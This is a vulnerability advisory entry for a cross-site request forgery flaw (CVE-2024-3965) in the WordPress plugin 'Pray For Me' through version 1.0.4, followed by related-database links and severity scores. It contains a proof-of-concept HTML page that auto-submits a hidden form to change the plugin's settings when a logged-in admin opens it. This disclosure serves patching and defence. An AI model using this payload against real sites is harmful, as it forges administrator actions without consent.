Lucene search
Bob MatyasWPEX-ID:0E1BA2B3-5849-42F6-B503-8B3B520E4A79HistoryMay 24, 2024 - 12:00 a.m.
Pray For Me <= 1.0.4 - Settings Update via CSRF
2024-05-2400:00:00
Bob Matyas
10
pray for me
csrf
html
security exploit
admin
csrf settings update
cross-site request forgery
Description The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
Make a logged in admin open an HTML file containing:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin.php?page=caruso_prayer_plugin_settings" method="post">
<input type="hidden" name="form_title" value="CSRF" />
<input type="hidden" name="form_message" value="CSRF" />
<input type="hidden" name="confirm_title" value="CSRF" />
<input type="hidden" name="confirm_message" value="CSRF" />
<input type="hidden" name="action" value="Save Settings" />
<input type="submit" value="Submit" />
</form>
</body>
```Related
vulnrichment
vulnrichment
CVE-2024-3965 Pray For Me <= 1.0.4 - Settings Update via CSRF
2024-06-14 06:00:02
wpvulndb
wpvulndb
Pray For Me <= 1.0.4 - Settings Update via CSRF
2024-05-24 00:00:00
cvelist
cvelist
CVE-2024-3965 Pray For Me <= 1.0.4 - Settings Update via CSRF
2024-06-14 06:00:02
cve
cve
CVE-2024-3965
2024-06-14 06:15:12
nvd
nvd
CVE-2024-3965
2024-06-14 06:15:12
wordfence
wordfence
6.6 Medium
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
9.1%
Related for WPEX-ID:0E1BA2B3-5849-42F6-B503-8B3B520E4A79